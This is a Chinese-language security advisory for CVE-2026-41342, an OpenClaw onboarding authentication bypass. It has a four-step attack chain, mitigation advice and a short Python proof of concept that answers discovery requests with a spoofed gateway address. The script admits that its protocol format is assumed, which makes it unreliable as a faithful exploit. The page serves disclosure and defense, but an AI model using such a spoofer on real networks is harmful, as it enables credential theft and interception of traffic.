IPBUF安全漏洞报告
English
CVE-2026-41342 CVSS 7.3 高危

CVE-2026-41342 OpenClaw远程入职认证绕过漏洞

披露日期: 2026-04-23

漏洞信息

漏洞编号
CVE-2026-41342
漏洞类型
认证绕过
CVSS评分
7.3 高危
攻击向量
邻接 (AV:A)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
OpenClaw

相关标签

认证绕过OpenClaw中间人攻击凭证窃取

漏洞概述

OpenClaw 2026.3.28之前版本存在严重的认证绕过漏洞。该漏洞源于远程入职组件在缺乏显式信任确认机制的情况下,持久化未经身份验证的发现端点。攻击者可利用此缺陷伪造发现端点,将设备入职流量重定向至受控的恶意网关,从而窃取关键网关凭证或监控敏感通信数据。

技术细节

该漏洞的核心机制在于OpenClaw远程入职流程中对发现端点信任验证的缺失。在受影响版本中,当设备进行远程入职或配置更新时,系统会自动发现并连接网关,但未对发现的端点实施严格的身份验证。攻击者位于同一邻接网络(AV:A)时,可以响应受害者的发现请求,并返回一个由攻击者控制的恶意网关地址。由于该过程无需管理员权限(PR:N)且仅需部分用户交互(UI:R),受害设备会接受并持久化此恶意配置。这导致机密性(C:H)和完整性(I:H)受损,攻击者进而可截获凭证或实施中间人攻击。

攻击链分析

STEP 1
1. 网络定位
攻击者接入目标OpenClaw设备所在的邻接网络(AV:A),准备进行流量劫持。
STEP 2
2. 监听发现请求
攻击者运行恶意脚本,监听OpenClaw设备发出的远程入职发现请求。
STEP 3
3. 欺骗响应
当收到发现请求时,攻击者立即响应一个伪造的配置信息,指定攻击者控制的IP地址为合法网关。
STEP 4
4. 流量劫持与凭证窃取
由于缺乏验证,OpenClaw设备连接到恶意网关。攻击者捕获设备发送的凭证及后续流量。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-41342: OpenClaw Discovery Endpoint Spoofing # This script simulates a malicious discovery endpoint to redirect traffic. import socket # Malicious Gateway Configuration MALICIOUS_IP = "192.168.1.100" LISTEN_PORT = 5353 # Example UDP port for discovery service def run_spoof_server(): # Create UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(("0.0.0.0", LISTEN_PORT)) print(f"[*] Listening for OpenClaw discovery requests on port {LISTEN_PORT}...") try: while True: data, addr = sock.recvfrom(1024) print(f"[+] Received discovery request from {addr}") # Construct a malicious response payload # Payload structure depends on the actual protocol, assuming a simple key-value format payload = f"GATEWAY={MALICIOUS_IP};PORT=443" # Send malicious configuration to the victim sock.sendto(payload.encode(), addr) print(f"[+] Sent malicious gateway configuration: {MALICIOUS_IP} to {addr}") except KeyboardInterrupt: print("\n[*] Stopping spoofing server.") if __name__ == "__main__": run_spoof_server()

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施
在无法立即升级的情况下,建议禁用远程自动发现功能,改为手动配置网关地址;或者在网络层实施ACL策略,仅允许受信任的服务器响应发现请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表